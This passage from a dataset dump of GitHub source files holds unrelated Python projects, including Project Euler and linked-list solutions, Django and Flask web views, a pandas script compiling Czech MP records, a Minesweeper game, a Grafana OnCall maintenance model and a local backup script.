time.time()\r\n\r\ndef is_prime(n):\r\n\r\n prime = True\r\n\r\n if n == 2:\r\n prime = True\r\n elif n % 2 == 0:\r\n prime = False\r\n elif n == 1 or n == -1:\r\n prime = False\r\n elif n < 0:\r\n prime = False\r\n\r\n if prime == True:\r\n size = int(math.sqrt(n))/2\r\n for i in range(0,size):\r\n if n % (3 + 2 * i) == 0:\r\n return False\r\n return prime\r\n\r\ntotal = 0\r\nmax_count = 0\r\nprimes = [2]\r\nstart = 0\r\ni = 3\r\n\r\nwhile(i < 5000000):\r\n\r\n if is_prime(i):\r\n primes.append(i)\r\n i += 2\r\n\r\ni = 1\r\n\r\nfor i in range(0, len(primes)):\r\n\r\n local_total = 0\r\n\r\n j = 0\r\n while (local_total + primes[i+j] < 1000000):\r\n local_total += primes[i+j]\r\n j += 1\r\n\r\n if j > max_count and is_prime(local_total):\r\n max_count = j\r\n total = local_total\r\n\r\nprint(is_prime(total))\r\n\r\nprint(\"Total: \" + str(total))\r\nprint(\"Start: \" + str(max_count))\r\nprint(\"Run Time: %s seconds\" % (time.time() - start_time))","repo_name":"blueshift-1/Project_Euler","sub_path":"Problem_0050.py","file_name":"Problem_0050.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29983718372","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom .models import Review\nfrom foods.models import DailyFood\nfrom .serializers import ReviewSerializer, ReviewListSerializer\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef get_daily_food_review(request, dailyfood_id):\n daily_food = get_object_or_404(DailyFood, id=dailyfood_id)\n if daily_food:\n reviews = Review.objects.filter(food=daily_food.food)[::-1]\n serializer = ReviewListSerializer(reviews, many=True)\n return Response(serializer.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n\n# 리뷰 생성, 포스트맨으로 확인 완료(사진도 업로드 가능)\n@api_view(['POST'])\ndef review_create(request, dailyfood_id):\n daily_food = get_object_or_404(DailyFood, id=dailyfood_id)\n if daily_food:\n serializer = ReviewSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save(user=request.user, food=daily_food.food, region=daily_food.region)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef review_get_delete_or_update(request, review_pk):\n review = get_object_or_404(Review, pk=review_pk)\n\n # 리뷰 조회\n # 단일 리뷰를 조회할 일 없을 것 같아서 allowany 추가 안 함\n def review_get(request, review):\n serializer = ReviewSerializer(review)\n return Response(serializer.data)\n\n # 리뷰 삭제\n def review_delete(request, review):\n if request.user == review.user:\n review.delete()\n data = {\n 'delete' : f'{review.user}가 쓰신 {review_pk}번 글이 삭제되었습니다.',\n }\n return Response(data, status=status.HTTP_204_NO_CONTENT)\n # 본인이 쓴 글이 아니거나 review_pk가 없는 경우라서 일단 400에러로 해둠\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n # 리뷰 수정\n def review_update(request, review):\n updated_review = ReviewSerializer(review, data=request.data)\n if updated_review.is_valid(raise_exception=True):\n updated_review.save()\n \n reviews = Review.objects.all()\n serializer = ReviewSerializer(reviews, many=True)\n return Response(serializer.data)\n\n if request.method == 'GET':\n return review_get(request, review)\n elif request.method == 'DELETE':\n return review_delete(request, review)\n elif request.method == 'PUT':\n return review_update(request, review)","repo_name":"shinkimi0i8/ssahaksik","sub_path":"django-back/communities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30503224615","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom cordova.commands import COMMANDS, HelpCommand\n\nclass Console(object):\n def __init__(self):\n arguments = sys.argv\n self.executable = arguments[0]\n if len(arguments) < 2:\n self.command = 'help'\n else:\n self.command = arguments[1]\n\n self.arguments = []\n if (len(arguments) > 2):\n self.arguments = arguments[2:]\n\n def run(self):\n command = [command for command in COMMANDS if command.key == self.command]\n\n if command and self.command != 'help':\n command[0](self).run()\n else:\n HelpCommand(self, COMMANDS).run()\n\n sys.exit(0)\n\ndef main():\n console = Console()\n console.run()\n\nif __name__ == '__main__':\n main()\n","repo_name":"heynemann/Cordova","sub_path":"cordova/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"37227318088","text":"#\n# Example file for working with conditional statements\n# \n\ndef main():\n x, y = 1000, 100\n \n # conditional flow uses if, elif, else; switch cases do not exist in python\n if(x < y):\n string = \"x is less than y\"\n elif(y < x):\n string = \"x is greater than y\"\n else:\n string = \"x is equal to y\"\n print(string) \n # conditional statements let you use \"a if C else b\"\n string = \"x is less than y\" if (x < y) else \"x is greater than or equal to y\" \n print(string)\nif __name__ == \"__main__\":\n main()\n","repo_name":"AHoffm24/python","sub_path":"Chapter2/conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24584643583","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n # linked_list_dict = set()\n\n # while head and head not in linked_list_dict:\n # linked_list_dict.add(head)\n # head = head.next\n \n # return head\n # slow, fast = head, head\n\n # while slow and fast and fast.next:\n # slow = slow.next\n # fast = fast.next.next\n # if fast == slow:\n # break\n \n # if not fast or not fast.next:\n # return None\n \n # temp = head\n\n # while True:\n # if temp == fast:\n # return fast\n # if fast == slow:\n # temp = temp.next\n # fast = fast.next\n \n slow, fast = head, head\n\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n break\n else:\n return None\n\n while head != slow:\n head, slow = head.next, slow.next\n \n return head\n \n\n","repo_name":"brandoneng000/LeetCode","sub_path":"medium/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30127956167","text":"\"\"\"Create list of all MPs.\"\"\"\n\n# data standard: https://www.popoloproject.com/specs/person.html\n\nimport datetime\nimport numpy as np\nimport pandas as pd\n\npath = './'\nsource_path = \"source/\"\ndata_path = \"data/\"\n\ncurrent_term = 'PSP9'\n\nregion_type = 'Volební kraj - 2002'\n\n# read osoby, transform to standard format\nosoby = pd.read_csv(path + source_path + \"osoby.unl\", sep=\"|\", encoding=\"cp1250\", header=None)\nheader = ['id', 'title_pre', 'family_name', 'given_name', 'title_post', 'birth_date', 'gender', 'updated_on', 'death_date', 'dummy']\nosoby.columns = header\nosoby['birth_date'] = osoby['birth_date'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d'))\nosoby['death_date'] = osoby['death_date'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read poslanec\nposlanec = pd.read_csv(path + source_path + \"poslanec.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['mp_id', 'id', 'region_id', 'list_id', 'org_id', 'web', 'street', 'municipality', 'postcode', 'email','phone', 'fax', 'psp_phone', 'facebook', 'photo', 'dummy']\nposlanec.columns = header\n\n# read organy\norgany = pd.read_csv(path + source_path + \"organy.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['org_id', 'sup_org_id', 'type_org_id', 'org_abbreviation', 'org_name_cs', 'org_name_en', 'org_since', 'org_until', 'priority', 'members_base', 'dummy']\norgany.columns = header\norgany['org_since'] = organy['org_since'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d'))\norgany['org_until'] = organy['org_until'].apply(lambda x: datetime.datetime.strptime(x, '%d.%m.%Y').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read typ_organu\ntyp_organu = pd.read_csv(path + source_path + \"typ_organu.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['type_org_id', 'type_sup_org_id', 'type_org_name_cs', 'type_org_name_en', 'general_type_org_id', 'priority', 'dummy']\ntyp_organu.columns = header\nparlament_id = typ_organu[typ_organu['type_org_name_cs'] == 'Parlament']['type_org_id'].values[0]\n\n# read zarazeni\nzarazeni = pd.read_csv(path + source_path + \"zarazeni.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['id', 'of_id', 'of_status', 'since', 'until', 'm_since', 'm_until', 'dummy']\nzarazeni.columns = header\nzarazeni['since'] = zarazeni['since'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d %H').strftime('%Y-%m-%d'))\nzarazeni['until'] = zarazeni['until'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d %H').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read funkce\nfunkce = pd.read_csv(path + source_path + \"funkce.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['id', '', 'funkce_id', 'since', 'until', 'dummy']\n\n# JOINS\nterm_id = organy[organy['org_abbreviation'] == current_term]['org_id'].values[0]\nterm_since = organy[organy['org_id'] == term_id]['org_since'].values[0]\ndata = poslanec[poslanec['org_id'] == term_id].merge(osoby, on='id')\ncurrent_parl = zarazeni[(zarazeni['of_id'] == term_id) & (zarazeni['of_status'] == 0)]\ndata = data.merge(current_parl, on='id')\n# . region\nregion_type = typ_organu[typ_organu['type_org_name_cs'] == region_type]['type_org_id'].values[0]\norgany_region = organy[organy['type_org_id'] == region_type].loc[:, ['org_id', 'org_name_cs', 'org_name_en']].rename(columns={'org_name_cs': 'region_name_cs', 'org_name_en': 'region_name_en', 'org_id': 'region_id'})\ndata = data.merge(organy_region, on='region_id')\n# list\ndata = data.merge(organy.loc[:, ['org_id', 'org_abbreviation', 'org_name_cs', 'org_name_en']].rename(columns={'org_abbreviation': 'list_abbreviation', 'org_name_cs': 'list_name_cs', 'org_name_en': 'list_name_en', 'org_id': 'list_id'}), on='list_id')\n# groups\ngroup_type = typ_organu[typ_organu['type_org_name_cs'] == 'Klub']['type_org_id'].values[0]\norgany_group = organy[organy['type_org_id'] == group_type].loc[:, ['org_id', 'org_name_cs', 'org_name_en', 'org_abbreviation']].rename(columns={'org_name_cs': 'group_name_cs', 'org_name_en': 'group_name_en', 'org_id': 'group_id', 'org_abbreviation': 'group_abbreviation'})\ngroup_memberships = zarazeni[(zarazeni['of_id'].isin(organy_group['group_id'])) & (zarazeni['of_status'] == 0) & (zarazeni['since'] > term_since)]\n# current groups\ncurrent_group_memberships = group_memberships[group_memberships['until'].isnull()].loc[:, ['id', 'of_id', 'since', 'until']].rename(columns={'of_id': 'group_id', 'since': 'group_since', 'until': 'group_until'})\ndata = data.merge(current_group_memberships, on='id', how='left')\n# last groups for former mps\nlast_group_memberships = group_memberships[group_memberships['until'].notnull()].loc[:, ['id', 'of_id', 'since', 'until']].rename(columns={'of_id': 'group_id', 'since': 'group_since', 'until': 'group_until'})\nlast_group_memberships['group_until_day'] = last_group_memberships['group_until'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))\nlast_group_memberships = last_group_memberships.loc[last_group_memberships.groupby('id')['group_until_day'].idxmax()]\ndata = data.merge(last_group_memberships, on='id', how='left')\n# merge groups\ndata['group_id'] = (data['group_id_x'].replace(np.nan, 0) + data['group_id_y'].replace(np.nan, 0)).astype(int)\ndata['last_group_since'] = (data['group_since_x'].replace(np.nan, '') + data['group_since_y'].replace(np.nan, ''))\ndata['last_group_until'] = data['group_until_y']\n# add group details\ndata = data.merge(organy_group, on='group_id', how='left')\ndata.rename(columns={'group_name_cs': 'last_group_name_cs', 'group_name_en': 'last_group_name_en', 'group_abbreviation': 'last_group_abbreviation', 'group_id': 'last_group_id'}, inplace=True)\n\n# currently in parliament\ndata['in_parliament'] = data['last_group_until'].isnull()\n\n# clear spaces\nc2c = data.columns[data.dtypes == 'object'].tolist()\nfor c in c2c:\n data[c] = data[c].apply(lambda x: x.strip() if type(x) == str else x)\n\n# filter\ncolumns = ['id', 'mp_id', 'family_name', 'given_name', 'title_pre', 'title_post', 'birth_date', 'death_date', 'gender', 'region_id', 'region_name_cs', 'region_name_en', 'list_id', 'list_abbreviation', 'list_name_cs', 'list_name_en', 'last_group_id', 'last_group_abbreviation','last_group_name_cs', 'last_group_name_en', 'last_group_since', 'last_group_until', 'in_parliament', 'web', 'street', 'municipality', 'postcode', 'email', 'phone', 'fax', 'psp_phone', 'facebook']\n\n# save\ndata.loc[:, columns].to_csv(path + data_path + 'mps.csv', index=False)\ndata.loc[:, columns].to_json(path + data_path + 'mps.json', orient='records', force_ascii=False, indent=2)\n","repo_name":"michalskop/cz-psp-votes-2021-202x","sub_path":"create_mp_list.py","file_name":"create_mp_list.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"4773455223","text":"import random\nimport math\ngrid = mines = flags = history = []\nminesCount = size = sweeped = 0\nfirstClick = True\ngameEnded = False\n\ndef Init():\n \"\"\"\n Initialisation, in case if I want to implement save game function\n \"\"\"\n ClearAll()\n return\n\n\ndef GameLoop():\n \"\"\"\n The Main game loops, handles inputs and passes them on to the necessary calculations\n \"\"\"\n GenerateGrid()\n while not gameEnded:\n DisplayGrid()\n print(\"Input location: 'x y' (numbers) to sweep OR 'x y f' to flag OR 'x y s' to sweep surrounding 3x3 tiles\")\n try:\n IN = GetXY()[:3]\n \n # Stores all user input history\n history.append(IN) \n\n # Flipped so that coding with it makes more sense (because grid[y][x] would be the correct one)\n IN[0], IN[1] = int(IN[1]) - 1, int(IN[0]) - 1 \n \n if firstClick:\n GenerateMines((IN[0], IN[1]))\n if len(IN) >= 3 and IN[2] == 'f':\n # I don't actually care if the user submits more than 3 values\n # I might change it to be stricter in the future\n Flag(IN[0], IN[1])\n elif len(IN) >= 3 and IN[2] == 's':\n Sweep(IN[0], IN[1])\n else:\n if (IN[0], IN[1]) in flags:\n print(\"That position is flagged, you must unflag it first!\")\n else:\n CalculateHit(IN[0], IN[1])\n if size**2 - sweeped == minesCount:\n Win()\n except:\n print(\"Please input data in the correct format.\")\n if IN == []: #DEBUG\n break\n # DisplayGrid() # Thinking that I should maybe display grid before the warning texts\n\n\ndef GenerateMines(firstClickXY):\n \"\"\"\n Generate the mines accoring to `size`^2 and `minesCount`\n Stored as an array of tuples in `mines`\n Occurs upon user picking a spot\n \"\"\"\n global firstClick, mines\n\n # Generate a list of numbers from 0 up to the grid size\n generationRange = list(range(0, size**2-1))\n\n sx, sy, ex, ey = FindSurroundingTiles(firstClickXY[0], firstClickXY[1])\n\n # Ensure the first click is always a 0, by removing the 3x3 values around it from the number range\n for i in range(sx, ex):\n for j in range(sy, ey):\n generationRange.remove(i + j * size)\n \n # Generate a random sample of values \n # Based on the mines amount that the player dictated at the beginning of the game\n rand = random.sample(generationRange, minesCount)\n\n # For each value generated, split it into x and y values and store it in `mines` global array\n # x: Which column, gotten through remainder of size / value\n # y: Which row, how many times does size divide into value \n mines = list(map(lambda value: (value%size, math.floor(value/size)), rand))\n\n print(mines) #DEBUG\n firstClick = False\n\n\ndef GenerateGrid():\n \"\"\"\n Generate a matrix of \"o\" with size `size`\n \"\"\"\n global grid\n grid = [[\"o\" for i in range(size)] for j in range(size)]\n\n\ndef Flag(x, y):\n \"\"\"\n Flags a location so that it can't be hit be mines\n Use it again on the same location to unflag it\n \"\"\"\n global flags, grid\n if (x, y) in flags:\n flags.remove((x, y))\n grid[x][y] = \"o\"\n elif grid[x][y] == \"o\":\n flags.append((x, y))\n grid[x][y] = \"f\"\n else:\n print(\"That spot has already been revealed!\")\n\n \ndef Sweep(x, y):\n \"\"\"\n Select an already open arean, and sweep it to allow for many blocks to be allowed at once\n \"\"\"\n if grid[x][y] == \"o\" or grid[x][y] == \"f\" or grid[x][y] == \".\":\n print(\"Cannot perform sweep on that tile.\")\n return\n\n sx, sy, ex, ey = FindSurroundingTiles(x, y)\n \n flaggedTiles = 0\n \n # Sweep the surrounding area\n for i in range(sx, ex):\n for j in range(sy, ey):\n if grid[i][j] == \"f\":\n flaggedTiles += 1\n\n # See if the player flagged the enough amount\n if flaggedTiles >= int(grid[x][y]):\n for i in range(sx, ex):\n for j in range(sy, ey):\n CalculateHit(i, j)\n else:\n print(\"You must have flagged tiles greater or equal to the possible mines in the area.\")\n\n \n\ndef CalculateHit(x, y):\n \"\"\"\n Check if the position is a mine or flagged, if not, calculate what to reveal\n \"\"\"\n global grid\n if (x, y) in mines and grid[x][y] != \"f\":\n Die(x, y)\n else:\n GetSurroundingMines(x, y)\n\n\ndef GetSurroundingMines(x, y):\n \"\"\"\n Get how many mines are surrounding the current position\n If this is completely clear then recursively get the numbers for the surrounding mines\n \"\"\"\n global sweeped\n if grid[x][y] == \"o\":\n sweeped += 1\n\n surroundingMines = 0\n\n sx, sy, ex, ey = FindSurroundingTiles(x, y)\n\n # Check if any surrounding tile is a mine\n for i in range(sx, ex):\n for j in range(sy, ey):\n surroundingMines += (i, j) in mines \n\n # If there's 0 mines in the surrounding tiles, then use \".\" instead\n grid[x][y] = surroundingMines or \".\"\n\n # If every tile surrounding it is empty, then automatically open them up as well\n if surroundingMines == 0:\n for i in range(sx, ex):\n for j in range(sy, ey):\n # Only do it if they haven't been opened up alreadys\n if grid[i][j] == \"o\":\n GetSurroundingMines(i, j)\n\n\ndef Die(x, y):\n \"\"\"\n When the player hits a mine, the game ends\n \"\"\"\n global grid, gameEnded\n for mine in mines:\n if mine in flags:\n grid[mine[0]][mine[1]] = \"F\" # Flagged Mine\n else:\n grid[mine[0]][mine[1]] = \"M\" # Unflagged Mine\n \n grid[x][y] = \"X\" # Death Hit\n print(\"X is the hit, M is unflagged mine, F is flagged mine\")\n print(\"DEBUG: You hit a mine!\") #DEBUG\n\n gameEnded = True\n\n\ndef Win():\n \"\"\"\n When the player sucessfully reveals all the tiles without mines, they win\n \"\"\"\n global gameEnded\n print(\"\"\"\n ---------------------------------------\n YOU WIN!!!\n ---------------------------------------\n \"\"\")\n\n gameEnded = True\n\n\ndef DisplayGrid():\n \"\"\"\n Displays the current gamestate, with numbers on the side to help keep track\n \"\"\"\n gridDisplay = \"\"\n\n # The amount of digit of the largest number + 1 for padding\n padding = len(str(size))+1 \n\n for i in range(size+1):\n for j in range(size+1):\n if i == 0:\n a = \" \" if j == 0 else j\n elif j == 0:\n a = i\n else:\n a = grid[i-1][j-1]\n # a is what to display\n # and then after displaying a, pad it until it's the right with (using padding)\n gridDisplay += \"{0:<{padding}}\".format(a, padding=padding)\n gridDisplay += \"\\n\"\n print(gridDisplay)\n\n\ndef ClearAll():\n \"\"\"\n Clear all global variables\n \"\"\"\n global grid, mines, flags, minesCount, size, firstClick, history, gameEnded\n grid = mines = flags = history = []\n minesCount = size = 0\n firstClick = True\n gameEnded = False\n\n\ndef GetXY():\n \"\"\"\n Gets the input and splits them into array\n \"\"\"\n IN = input()\n IN = IN.split() # Splits by all whitespace chunks\n return IN\n\n\ndef FindSurroundingTiles(x, y):\n \"\"\"\n Find the surrounding 3x3 tiles, but within the bounding box\n \"\"\"\n return [max(x-1, 0), max(y-1, 0), min(x+2, size), min(y+2, size)] # Start X, End X, Start Y, End Y\n\n\nwhile True:\n Init()\n\n print(\"Input the size of the map and the amount of mines: 'size mines'\")\n IN = GetXY()\n size = int(IN[0])\n minesCount = int(IN[1])\n GameLoop()\n print(\"\\nTHIS IS THE FINAL BOARDSTATE\\n\")\n DisplayGrid()\n\n print(\"Do you want to restart? y/n\")\n IN = input()\n if IN.lower() != \"y\":\n break\n","repo_name":"AmethystProductions/Minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"9148379948","text":"import os\nfrom flask import Flask, request, render_template, redirect\nfrom lib.database_connection import get_flask_database_connection\nfrom lib.album_repository import AlbumRepository\nfrom lib.artist_repository import ArtistRepository\nfrom lib.album import Album\n# Create a new Flask app\napp = Flask(__name__)\n\n# == Your Routes Here ==\n\n\n# == Example Code Below ==\n\n# GET /emoji\n# Returns a smiley face in HTML\n# Try it:\n# ; open http://localhost:5000/emoji\n@app.route('/emoji', methods=['GET'])\ndef get_emoji():\n # We use `render_template` to send the user the file `emoji.html`\n # But first, it gets processed to look for placeholders like {{ emoji }}\n # These placeholders are replaced with the values we pass in as arguments\n return render_template('emoji.html', emoji=':)')\n\n@app.route('/albums', methods=['GET'])\ndef get_albums():\n connection = get_flask_database_connection(app)\n repository = AlbumRepository(connection)\n albums = repository.all()\n return render_template('albums/index.html', albums=albums )\n\n@app.route('/albums/')\ndef get_single_album(id):\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n album = album_repository.find(id)\n artist_repository = ArtistRepository(connection)\n artist = artist_repository.find(album.artist_id)\n return render_template('albums/single_album.html', album=album, artist=artist)\n\n@app.route('/artists')\ndef get_artists():\n connection = get_flask_database_connection(app)\n artist_repository = ArtistRepository(connection)\n artists = artist_repository.all()\n return render_template('artists/index.html', artists=artists)\n\n@app.route('/artists/')\ndef get_single_artist(id):\n connection = get_flask_database_connection(app)\n artist_repository = ArtistRepository(connection)\n artist = artist_repository.find(id)\n return render_template('artists/artist_info.html', artist=artist)\n\n@app.route('/albums/new')\ndef get_new_albums():\n return render_template('albums/new.html')\n\n@app.route('/albums/new', methods=['POST'])\ndef create_new_album():\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n title = request.form[\"title\"]\n release_year = request.form[\"release_year\"]\n artist_id = request.form[\"artist_id\"]\n album = Album(None, title, release_year, artist_id)\n if album.is_valid() == True:\n album_repository.create(album)\n album_id = _get_album_id_by_title(album.title)\n return redirect(f\"/albums/{album_id}\")\n else:\n return render_template('albums/new.html', errors=album.get_error_message())\n \n\ndef _get_album_id_by_title(title):\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n albums = album_repository.all()\n for album in albums:\n if album.title == title:\n return album.id\n\n\n\n# This imports some more example routes for you to see how they work\n# You can delete these lines if you don't need them.\nfrom example_routes import apply_example_routes\napply_example_routes(app)\n\n# == End Example Code ==\n\n# These lines start the server if you run this file directly\n# They also start the server configured to use the test database\n# if started in test mode.\nif __name__ == '__main__':\n app.run(debug=True, port=int(os.environ.get('PORT', 5000)))\n","repo_name":"gmckz/web_apps_music_web_app_html","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16068972354","text":"import datetime\nfrom uuid import uuid4\n\nimport humanize\nimport pytz\nfrom django.db import models, transaction\nfrom django.utils import timezone\n\nfrom common.exceptions import MaintenanceCouldNotBeStartedError\nfrom common.insight_log import MaintenanceEvent, write_maintenance_insight_log\n\n\nclass MaintainableObject(models.Model):\n class Meta:\n abstract = True\n\n DURATION_ONE_HOUR = datetime.timedelta(hours=1)\n DURATION_THREE_HOURS = datetime.timedelta(hours=3)\n DURATION_SIX_HOURS = datetime.timedelta(hours=6)\n DURATION_TWELVE_HOURS = datetime.timedelta(hours=12)\n DURATION_TWENTY_FOUR_HOURS = datetime.timedelta(hours=24)\n\n MAINTENANCE_DURATION_CHOICES = (\n (DURATION_ONE_HOUR, \"1 hour\"),\n (DURATION_THREE_HOURS, \"3 hours\"),\n (DURATION_SIX_HOURS, \"6 hours\"),\n (DURATION_TWELVE_HOURS, \"12 hours\"),\n (DURATION_TWENTY_FOUR_HOURS, \"24 hours\"),\n )\n\n maintenance_duration = models.DurationField(default=None, null=True, choices=MAINTENANCE_DURATION_CHOICES)\n (DEBUG_MAINTENANCE, MAINTENANCE) = range(2)\n\n DEBUG_MAINTENANCE_KEY = \"Debug\"\n MAINTENANCE_KEY = \"Maintenance\"\n\n MAINTENANCE_MODE_CHOICES = ((DEBUG_MAINTENANCE, DEBUG_MAINTENANCE_KEY), (MAINTENANCE, MAINTENANCE_KEY))\n MAINTENANCE_VERBAL = {\n DEBUG_MAINTENANCE: \"Debug (silence all escalations)\",\n MAINTENANCE: \"Maintenance (collect everything in one incident)\",\n }\n\n maintenance_mode = models.IntegerField(default=None, null=True, choices=MAINTENANCE_MODE_CHOICES)\n\n maintenance_uuid = models.CharField(max_length=250, unique=True, null=True, default=None)\n maintenance_started_at = models.DateTimeField(null=True, default=None)\n maintenance_author = models.ForeignKey(\n \"user_management.user\", on_delete=models.SET_NULL, null=True, related_name=\"%(class)s_maintenances_created\"\n )\n\n def start_disable_maintenance_task(self, countdown):\n raise NotImplementedError\n\n def get_organization(self):\n raise NotImplementedError\n\n def get_team(self):\n raise NotImplementedError\n\n def get_verbal(self):\n raise NotImplementedError\n\n def force_disable_maintenance(self, user):\n raise NotImplementedError\n\n def notify_about_maintenance_action(self, text, send_to_general_log_channel=True):\n raise NotImplementedError\n\n def start_maintenance(self, mode, maintenance_duration, user):\n from apps.alerts.models import Alert, AlertGroup, AlertReceiveChannel\n\n with transaction.atomic():\n _self = self.__class__.objects.select_for_update().get(pk=self.pk)\n if _self.maintenance_mode is not None:\n raise MaintenanceCouldNotBeStartedError(\"Already on maintenance\")\n organization = _self.get_organization()\n team = _self.get_team()\n verbal = _self.get_verbal()\n user_verbal = user.get_username_with_slack_verbal()\n duration_verbal = humanize.naturaldelta(maintenance_duration)\n # NOTE: there could be multiple maintenance integrations in case of a race condition\n # (no constraints at the db level, it shouldn't be an issue functionality-wise)\n maintenance_integration = AlertReceiveChannel.objects_with_maintenance.filter(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_MAINTENANCE,\n ).last()\n if maintenance_integration is None:\n maintenance_integration = AlertReceiveChannel.create(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_MAINTENANCE,\n author=user,\n )\n\n maintenance_uuid = _self.start_disable_maintenance_task(maintenance_duration)\n\n _self.maintenance_duration = datetime.timedelta(seconds=maintenance_duration)\n _self.maintenance_uuid = maintenance_uuid\n _self.maintenance_mode = mode\n _self.maintenance_started_at = timezone.now()\n _self.maintenance_author = user\n _self.save(\n update_fields=[\n \"maintenance_duration\",\n \"maintenance_uuid\",\n \"maintenance_mode\",\n \"maintenance_started_at\",\n \"maintenance_author\",\n ]\n )\n self.maintenance_duration = _self.maintenance_duration\n self.maintenance_uuid = _self.maintenance_uuid\n self.maintenance_mode = _self.maintenance_mode\n self.maintenance_started_at = _self.maintenance_started_at\n self.maintenance_author = _self.maintenance_author\n if mode == AlertReceiveChannel.MAINTENANCE:\n group = AlertGroup.objects.create(\n distinction=uuid4(),\n web_title_cache=f\"Maintenance of {verbal} for {maintenance_duration}\",\n maintenance_uuid=maintenance_uuid,\n channel_filter_id=maintenance_integration.default_channel_filter.pk,\n channel=maintenance_integration,\n )\n title = f\"Maintenance of {verbal} for {duration_verbal}\"\n message = (\n f\"Initiated by {user_verbal}.\"\n f\" During this time all alerts from integration will be collected here without escalations\"\n )\n alert = Alert(\n is_the_first_alert_in_group=True,\n is_resolve_signal=False,\n title=title,\n message=message,\n group=group,\n raw_request_data={\n \"title\": title,\n \"message\": message,\n },\n )\n alert.save()\n write_maintenance_insight_log(self, user, MaintenanceEvent.STARTED)\n if mode == AlertReceiveChannel.MAINTENANCE:\n self.notify_about_maintenance_action(\n f\"Maintenance of {verbal}. Initiated by {user_verbal} for {duration_verbal}.\",\n send_to_general_log_channel=False,\n )\n else:\n self.notify_about_maintenance_action(\n f\"Debug of {verbal}. Initiated by {user_verbal} for {duration_verbal}.\"\n )\n\n @property\n def till_maintenance_timestamp(self):\n if self.maintenance_started_at is not None and self.maintenance_duration is not None:\n return int((self.maintenance_started_at + self.maintenance_duration).astimezone(pytz.UTC).timestamp())\n return None\n\n @property\n def started_at_timestamp(self):\n if self.maintenance_started_at is not None and self.maintenance_duration is not None:\n return int(self.maintenance_started_at.astimezone(pytz.UTC).timestamp())\n return None\n\n @classmethod\n def maintenance_duration_options_in_seconds(cls):\n options_in_seconds = []\n for ch in cls.MAINTENANCE_DURATION_CHOICES:\n options_in_seconds.append(int(ch[0].total_seconds()))\n return options_in_seconds\n","repo_name":"grafana/oncall","sub_path":"engine/apps/alerts/models/maintainable_object.py","file_name":"maintainable_object.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","stars":3019,"dataset":"github-code","pt":"71"} +{"seq_id":"3768726782","text":"import os\nimport shutil\nimport datetime\n\n# Source directory to backup\nsource_dir = '/path/to/source'\n\n# Destination directory for backups\nbackup_dir = '/path/to/backup'\n\n# Create backup directory if it doesn't exist\nif not os.path.exists(backup_dir):\n os.makedirs(backup_dir)\n\n# Generate backup file name with timestamp\ntimestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\nbackup_file = f'backup_{timestamp}.tar.gz'\n\n# Create a compressed backup archive\nbackup_path = os.path.join(backup_dir, backup_file)\nshutil.make_archive(backup_path, 'gztar', source_dir)\n\nprint(f'Backup created: {backup_file}')\n\n","repo_name":"Chamepp/Daily.py","sub_path":"DevOps/Server Provisioning 